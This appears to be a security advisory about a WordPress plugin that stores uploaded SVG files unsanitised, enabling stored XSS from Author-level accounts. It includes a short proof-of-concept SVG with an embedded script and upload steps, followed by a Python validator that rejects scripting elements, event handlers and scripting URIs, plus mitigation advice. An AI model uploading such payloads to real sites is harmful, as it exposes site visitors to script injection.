The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.
1. Upload a malicious SVG, for example:
   <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <script type="text/javascript"> alert("XSS Test"); </script> </svg>
2. Add the SVG to a post and view it; the embedded script executes, demonstrating the XSS.
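The root cause is that uploaded SVG content is accepted without inspection. The following is an added example, not code from the advisory or the affected plugin, of the kind of server-side check an upload handler should run before storing an SVG: it parses the file as XML and rejects any document that contains scripting elements, event-handler attributes or scripting URIs. It is written in Python as a stand-alone reference check (a WordPress plugin would implement the same logic in PHP); the sample inputs are constructed, and the malicious one is the advisory's own proof-of-concept payload.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can execute script or embed arbitrary foreign content.
FORBIDDEN_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# href values starting with a scripting/data scheme are rejected as well.
SCHEME_RE = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def local_name(qualified):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return qualified.split("}", 1)[1] if "}" in qualified else qualified


def find_svg_issues(svg_bytes):
    """Return the list of reasons this SVG must be rejected; empty means clean.

    Note: xml.etree is used here for portability; in production prefer
    defusedxml (assumption: available via pip) to also block entity attacks.
    """
    issues = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Not well-formed XML: never store it as an image.
        return [f"not well-formed XML: {exc}"]

    if local_name(root.tag) != "svg":
        issues.append(f"root element is <{local_name(root.tag)}>, not <svg>")

    # root.iter() walks every element, including the root itself.
    for el in root.iter():
        name = local_name(el.tag)
        if name in FORBIDDEN_TAGS:
            issues.append(f"forbidden element <{name}>")
        for attr, value in el.attrib.items():
            aname = local_name(attr)
            if aname.lower().startswith("on"):
                issues.append(f"event handler attribute {aname} on <{name}>")
            if aname == "href" and SCHEME_RE.match(value):
                issues.append(f"scripting URI in {aname} on <{name}>")
    return issues


def is_safe_svg(svg_bytes):
    """True only when no issue was found; the upload handler stores the file then."""
    return not find_svg_issues(svg_bytes)


# Constructed sample inputs for demonstration.
MALICIOUS_SVG = (
    b'<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">'
    b' <script type="text/javascript"> alert("XSS Test"); </script> </svg>'
)
CLEAN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
    b'<circle cx="5" cy="5" r="4" fill="red"/></svg>'
)

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG)):
        print(label, "->", "rejected" if not is_safe_svg(doc) else "accepted",
              find_svg_issues(doc))
```

A rejecting check like this should run on the server at upload time regardless of the uploader's role; serving uploaded SVGs with a `Content-Disposition: attachment` header or from a separate origin is a complementary mitigation, since any inline rendering of user-supplied SVG in the site's origin is what turns the embedded script into stored XSS.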